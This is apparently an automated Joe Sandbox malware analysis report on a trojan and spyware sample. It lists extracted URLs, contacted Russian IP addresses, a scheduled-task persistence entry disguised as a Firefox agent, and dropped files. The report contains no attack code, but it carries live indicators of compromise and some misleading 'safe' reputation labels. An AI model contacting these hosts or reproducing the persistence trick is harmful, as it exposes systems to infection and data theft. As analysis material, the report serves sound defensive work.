http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publiczna	12F1.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id15Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js	12F1.exe, 00000009.00000000.772392521.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000002.949620420.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000003.774260268.0000000002921000.00000004.00000001.sdmp, 12F1.exe.6.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://api.ip.sb/ip	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp, 1EAA.exe, 0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000000.830171711.0000000000402000.00000040.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://socfinder.site/	12F1.exe, 00000009.00000000.772392521.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000002.949620420.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000003.774260268.0000000002921000.00000004.00000001.sdmp, 12F1.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp, 305.exe, 00000016.00000003.849942503.0000000000BB3000.00000004.00000001.sdmp, default_webdata.db.22.dr, default_webdata.db0.22.dr	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id24Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.972514653.0000000002B33000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973675321.0000000002C63000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtabWbP	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id5Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD	1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id10Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id8Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_wmp	12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	false		high
http://95.181.152.139	1EAA.exe, 00000014.00000002.972514653.0000000002B33000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	12F1.exe, 00000009.00000002.975014024.00000000032C2000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961234629.0000000002950000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_java	12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://cdn.discordapp.com	1EAA.exe, 00000014.00000002.973486115.0000000002C34000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id13Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://socfinder.site	12F1.exe, 00000009.00000000.772392521.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000002.949620420.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000003.774260268.0000000002921000.00000004.00000001.sdmp, 12F1.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id22ResponseP	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	12F1.exe, 00000009.00000002.980544860.000000000381F000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978366259.00000000035BF000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978236166.00000000035A9000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979046859.000000000375D000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.990127362.000000000471C000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.986155603.0000000003835000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.987830142.0000000004323000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.987221827.00000000042B2000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977009198.00000000034E7000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.988391512.00000000043D5000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.976120725.0000000003425000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.990329619.000000000478D000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.972315396.0000000002B1D000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961521514.0000000002A5B000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.975235454.0000000003942000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.974497889.0000000002D14000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.975544789.00000000039B3000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.974600365.0000000002D2A000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.972514653.0000000002B33000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp, 305.exe, 00000016.00000003.849942503.0000000000BB3000.00000004.00000001.sdmp, default_webdata.db.22.dr, default_webdata.db0.22.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id19ResponseP	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id22ResponseH	1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id19ResponseH	1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22Response	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978687020.00000000036EC000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	12F1.exe, 00000009.00000002.980544860.000000000381F000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978366259.00000000035BF000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978236166.00000000035A9000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979046859.000000000375D000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.990127362.000000000471C000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.986155603.0000000003835000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.987830142.0000000004323000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.987221827.00000000042B2000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977009198.00000000034E7000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.988391512.00000000043D5000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.976120725.0000000003425000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.990329619.000000000478D000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.972315396.0000000002B1D000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961521514.0000000002A5B000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.975235454.0000000003942000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.974497889.0000000002D14000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.975544789.00000000039B3000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.974600365.0000000002D2A000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.972514653.0000000002B33000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp, 305.exe, 00000016.00000003.849942503.0000000000BB3000.00000004.00000001.sdmp, default_webdata.db.22.dr, default_webdata.db0.22.dr	false		high
https://duckduckgo.com/chrome_newtabPa	12F1.exe, 00000009.00000002.978366259.00000000035BF000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://get.adob	12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id18Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://service.real.com/realplayer/security/02062012_player/en/	12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com4hl	1EAA.exe, 00000014.00000002.973376571.0000000002C1F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
92.255.76.197	unknown	Russian Federation	49345	CONTINENTAL_GROUP-ASRU	false
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
95.213.165.249	host-data-coin-11.com	Russian Federation	49505	SELECTELRU	false
45.9.20.149	unknown	Russian Federation	35913	DEDIPATH-LLCUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	531707
Start date:	01.12.2021
Start time:	09:12:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 19s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	v72n86vFFq.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@37/34@66/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 43.4% (good quality ratio 25.6%) Quality average: 40.6% Quality standard deviation: 38.9%
HCA Information:	Successful, ratio: 93% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. HTTP Packets have been reduced TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.70.208, 40.127.240.158, 104.208.16.94, 20.54.110.249, 52.182.143.212 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:13:54	Task Scheduler	Run new task: Firefox Default Browser Agent 9B65F8BFAD36B8C4 path: C:\Users\user\AppData\Roaming\hiftsuu
09:14:17	API Interceptor	1x Sleep call for process: 44A2.exe modified
09:14:50	API Interceptor	1x Sleep call for process: WerFault.exe modified
09:15:29	Task Scheduler	Run new task: tkools.exe path: C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_361B.exe_8ef6c44223352ed135f6b63558ea136140d6fc2c_f485856f_1ada34a1\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
